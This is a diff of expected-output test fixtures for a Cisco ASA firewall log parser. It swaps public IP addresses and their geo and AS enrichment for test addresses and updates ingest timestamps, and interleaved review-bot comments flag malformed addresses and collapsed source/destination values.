- "ingested": "2021-10-11T11:44:17.555182800Z",
- "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585",
+ "ingested": "2021-12-09T13:33:30.615409Z",
+ "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585",
 "code": "302016",
 "kind": "event",
 "start": "2021-05-05T18:38:46.000Z",
@@ -1729,7 +1708,7 @@
 },
 "destination": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "port": 22638,
@@ -1737,7 +1716,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.4"
+ "ip": "81.2.69.144"
 },
 "address": "10.10.10.10",
 "port": 161,
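Review bot: `1192.168.2.2` in the `@@ -1630,27 +1627,9 @@` hunk is not a valid IPv4 address (first octet 1192), which is why the expected document now carries it as `destination.domain` and under `related.hosts` instead of `destination.ip` and `related.ip`; this reads like a typo for the private `192.168.2.2` that was meant to replace the public `192.186.2.2`. If the intent was only to drop the GeoIP/AS enrichment, the fixture should use a valid address so the test keeps asserting the IP path rather than the hostname fallback, e.g. `"address": "192.168.2.2", "ip": "192.168.2.2"` with the matching value in `related.ip`. The `@@ -1687,11 +1666,11 @@` and `@@ -1700,8 +1679,8 @@` hunks carry the same value, and the input log line that produces this document is outside this chunk.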
@@ -1777,9 +1756,8 @@
 ],
 "ip": [
 "10.10.10.10",
- "8.8.8.4",
- "192.168.2.2",
- "8.8.8.8"
+ "81.2.69.144",
+ "192.168.2.2"
 ]
 },
 "host": {
@@ -1787,8 +1765,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-10-11T11:44:17.555187800Z",
- "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)",
+ "ingested": "2021-12-09T13:33:30.615413600Z",
+ "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -1803,8 +1781,8 @@
 "asa": {
 "destination_interface": "net",
 "mapped_source_port": 161,
- "mapped_destination_ip": "8.8.8.8",
- "mapped_source_ip": "8.8.8.4",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "1743372",
 "source_interface": "intfacename",
 "mapped_destination_port": 22638
@@ -1817,7 +1795,7 @@
 },
 "destination": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "port": 22638,
@@ -1825,7 +1803,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.4"
+ "ip": "81.2.69.144"
 },
 "address": "10.10.10.10",
 "port": 161,
@@ -1865,9 +1843,8 @@
 ],
 "ip": [
 "10.10.10.10",
- "8.8.8.4",
- "192.168.2.2",
- "8.8.8.8"
+ "81.2.69.144",
+ "192.168.2.2"
 ]
 },
 "host": {
@@ -1875,8 +1852,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-10-11T11:44:17.555193600Z",
- "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)",
+ "ingested": "2021-12-09T13:33:30.615418900Z",
+ "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -1891,8 +1868,8 @@
 "asa": {
 "destination_interface": "net",
 "mapped_source_port": 161,
- "mapped_destination_ip": "8.8.8.8",
- "mapped_source_ip": "8.8.8.4",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "1743372",
 "source_interface": "intfacename",
 "mapped_destination_port": 22638
@@ -1954,7 +1931,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-11T11:44:17.555200300Z",
+ "ingested": "2021-12-09T13:33:30.615423800Z",
 "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]",
 "code": "106023",
 "kind": "event",
@@ -2024,7 +2001,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-11T11:44:17.555206900Z",
+ "ingested": "2021-12-09T13:33:30.615429400Z",
 "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111",
 "code": "106021",
 "kind": "event",
@@ -2095,7 +2072,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-10-11T11:44:17.555214800Z",
+ "ingested": "2021-12-09T13:33:30.615435100Z",
 "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111",
 "code": "106006",
 "kind": "event",
@@ -2165,7 +2142,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555219200Z",
+ "ingested": "2021-12-09T13:33:30.615440700Z",
 "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111",
 "code": "106015",
 "kind": "event",
@@ -2235,7 +2212,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555224800Z",
+ "ingested": "2021-12-09T13:33:30.615446300Z",
 "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111",
 "code": "106015",
 "kind": "event",
@@ -2305,7 +2282,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555232700Z",
+ "ingested": "2021-12-09T13:33:30.615469500Z",
 "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111",
 "code": "106015",
 "kind": "event",
@@ -2380,8 +2357,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555237500Z",
- "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)",
+ "ingested": "2021-12-09T13:33:30.615475600Z",
+ "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)",
 "code": "302022",
 "kind": "event",
 "action": "firewall-rule",
@@ -2454,8 +2431,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555242100Z",
- "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)",
+ "ingested": "2021-12-09T13:33:30.615479800Z",
+ "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)",
 "code": "302022",
 "kind": "event",
 "action": "firewall-rule",
@@ -2528,8 +2505,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555245800Z",
- "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)",
+ "ingested": "2021-12-09T13:33:30.615484Z",
+ "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)",
 "code": "302022",
 "kind": "event",
 "action": "firewall-rule",
@@ -2605,7 +2582,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "Cluster flow with CLU closed on owner",
- "ingested": "2021-10-11T11:44:17.555251200Z",
+ "ingested": "2021-12-09T13:33:30.615488100Z",
 "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner",
 "code": "302023",
 "kind": "event",
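Review bot: The `original` string in the `@@ -2528,8 +2505,8 @@` hunk is rewritten but still contains `net:192.1682.2.2/10051`, an address with a four-digit octet that no IP parser will accept. Since the line is being edited anyway, correcting it to `192.168.2.2` in both the input log and this expected string would stop the fixture from asserting parser behaviour on a malformed value, unless exercising that malformed form is deliberate, in which case a comment in the PR description saying so would help. The parsed fields of this document are outside the hunk, so what the pipeline currently extracts from it cannot be checked here.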
@@ -2684,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-10-11T11:44:17.555257500Z", + "ingested": "2021-12-09T13:33:30.615492300Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2735,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555264100Z", + "ingested": "2021-12-09T13:33:30.615496100Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", @@ -2786,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555271900Z", + "ingested": "2021-12-09T13:33:30.615499900Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2862,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555279500Z", + "ingested": "2021-12-09T13:33:30.615503800Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2939,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555287200Z", + "ingested": "2021-12-09T13:33:30.615508400Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", 
@@ -2985,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555294700Z", + "ingested": "2021-12-09T13:33:30.615512600Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3028,8 +3005,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555302200Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)", + "ingested": "2021-12-09T13:33:30.615517800Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", "action": "firewall-rule", @@ -3097,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555309700Z", + "ingested": "2021-12-09T13:33:30.615522100Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3141,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555317400Z", + "ingested": "2021-12-09T13:33:30.615526400Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", 
@@ -3184,8 +3161,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555324900Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)", + "ingested": "2021-12-09T13:33:30.615531Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", "action": "firewall-rule", @@ -3256,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-11T11:44:17.555332500Z", + "ingested": "2021-12-09T13:33:30.615535800Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3301,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555340Z", + "ingested": "2021-12-09T13:33:30.615541700Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", @@ -3384,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-11T11:44:17.555345600Z", + "ingested": "2021-12-09T13:33:30.615546400Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3460,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555349200Z", + "ingested": "2021-12-09T13:33:30.615551500Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", 
@@ -3523,7 +3500,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555354900Z", + "ingested": "2021-12-09T13:33:30.615555400Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3585,7 +3562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555360400Z", + "ingested": "2021-12-09T13:33:30.615560100Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]", "code": "304001", "kind": "event", @@ -3647,7 +3624,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555366700Z", + "ingested": "2021-12-09T13:33:30.615565100Z", "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23", "code": "304001", "kind": "event", @@ -3709,7 +3686,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555370900Z", + "ingested": "2021-12-09T13:33:30.615568800Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", 
@@ -3734,42 +3711,48 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "FR-63", - "city_name": "Clermont-Ferrand", - "country_iso_code": "FR", - "country_name": "France", - "region_name": "Puy-de-Dôme", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 3.0966, - "lat": 45.7838 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 3215, + "number": 20712, "organization": { - "name": "Orange" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "2.3.4.5", + "address": "81.2.69.144", "port": 9101, - "ip": "2.3.4.5" + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "1.2.3.4", + "address": "81.2.69.144", "port": 54242, - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -3804,8 +3787,7 @@ "dev01" ], "ip": [ - "1.2.3.4", - "2.3.4.5" + "81.2.69.144" ] }, "host": { 
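Review bot: In `@@ -3734` the teardown event now has the same address `81.2.69.144` on both `source` and `destination`, so `related.ip` collapses to a single entry in `@@ -3804` and the expectation no longer distinguishes the two sides; the `event.original` at `@@ -3815` on the next line shows the same symmetry. A regression that swaps or cross-copies source/destination geo or AS enrichment would pass this test unchanged, whereas the previous fixture with two distinct addresses would have caught it. Using a second address from the geo test database for the destination side keeps both sides enriched and distinct.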
@@ -3815,8 +3797,8 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-10-11T11:44:17.555376400Z", - "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout", + "ingested": "2021-12-09T13:33:30.615573200Z", + "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", "start": "2021-04-27T03:12:21.000Z", @@ -3893,7 +3875,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555382500Z", + "ingested": "2021-12-09T13:33:30.615577900Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", @@ -3920,27 +3902,9 @@ "level": "notification" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "LV-RIX", - "city_name": "Riga", - "country_iso_code": "LV", - "country_name": "Latvia", - "region_name": "Riga", - "location": { - "lon": 24.0978, - "lat": 56.9496 - } - }, - "as": { - "number": 12578, - "organization": { - "name": "SIA Tet" - } - }, - "address": "195.122.12.242", "port": 53, - "ip": "195.122.12.242" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "port": 27218, @@ -3980,7 +3944,7 @@ "somedomainname.local" ], "ip": [ - "195.122.12.242" + "192.168.157.61" ] }, "host": { 
@@ -3988,8 +3952,8 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555386600Z", - "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:33:30.615582100Z", + "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -4042,7 +4006,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555391Z", + "ingested": "2021-12-09T13:33:30.615587400Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4100,7 +4064,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555394600Z", + "ingested": "2021-12-09T13:33:30.615592700Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4148,7 +4112,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555399900Z", + "ingested": "2021-12-09T13:33:30.615597300Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4226,7 +4190,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555405500Z", + "ingested": "2021-12-09T13:33:30.615601800Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", 
@@ -4286,7 +4250,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555411900Z", + "ingested": "2021-12-09T13:33:30.615606600Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4357,7 +4321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555419600Z", + "ingested": "2021-12-09T13:33:30.615611800Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", @@ -4417,7 +4381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555427200Z", + "ingested": "2021-12-09T13:33:30.615615400Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", @@ -4441,24 +4405,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4478,7 +4442,7 @@ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { 
@@ -4486,8 +4450,8 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555434800Z", - "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", + "ingested": "2021-12-09T13:33:30.615620200Z", + "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", "action": "firewall-rule", @@ -4509,31 +4473,31 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "bytes": 1216163, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "source": { "user": { - "name": "91.240.17.178", + "name": "81.2.69.144", "group": { - "name": "91.240.17.178" + "name": "81.2.69.144" } }, "bytes": 297103 @@ -4553,13 +4517,13 @@ }, "related": { "user": [ - "91.240.17.178" + "81.2.69.144" ], "hosts": [ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { 
@@ -4569,8 +4533,8 @@ "severity": 4, "duration": 1936000000000, "reason": "User Requested", - "ingested": "2021-10-11T11:44:17.555442400Z", - "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", + "ingested": "2021-12-09T13:33:30.615655900Z", + "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", "start": "2021-04-27T01:30:47.000Z", @@ -4629,7 +4593,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555450Z", + "ingested": "2021-12-09T13:33:30.615660Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", @@ -4656,25 +4620,28 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "user": { "name": "testuser" }, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4697,7 +4664,7 @@ "dev01" ], "ip": [ - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -4706,8 +4673,8 @@ "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-10-11T11:44:17.555457500Z", - "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.", + "ingested": "2021-12-09T13:33:30.615664600Z", + "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", "action": "firewall-rule", @@ -4767,7 +4734,7 @@ "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-10-11T11:44:17.555465300Z", + "ingested": "2021-12-09T13:33:30.615673800Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", 
@@ -4792,50 +4759,32 @@ "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-HCK", - "city_name": "Stoke Newington", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Hackney", - "location": { - "lon": -0.0765, - "lat": 51.5638 - } - }, - "as": { - "number": 8468, - "organization": { - "name": "Entanet" - } - }, - "address": "195.74.114.34", "port": 23, - "ip": "195.74.114.34" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -6.2488, - "lat": 53.3338 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 8075, + "number": 20712, "organization": { - "name": "Microsoft Corporation" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "104.46.88.19", + "address": "81.2.69.144", "port": 6370, - "ip": "104.46.88.19" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4864,8 +4813,8 @@ "dev01" ], "ip": [ - "104.46.88.19", - "195.74.114.34" + "81.2.69.144", + "192.168.157.61" ] }, "host": { @@ -4873,8 +4822,8 @@ }, "event": { "severity": 3, - "ingested": "2021-10-11T11:44:17.555473100Z", - "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to 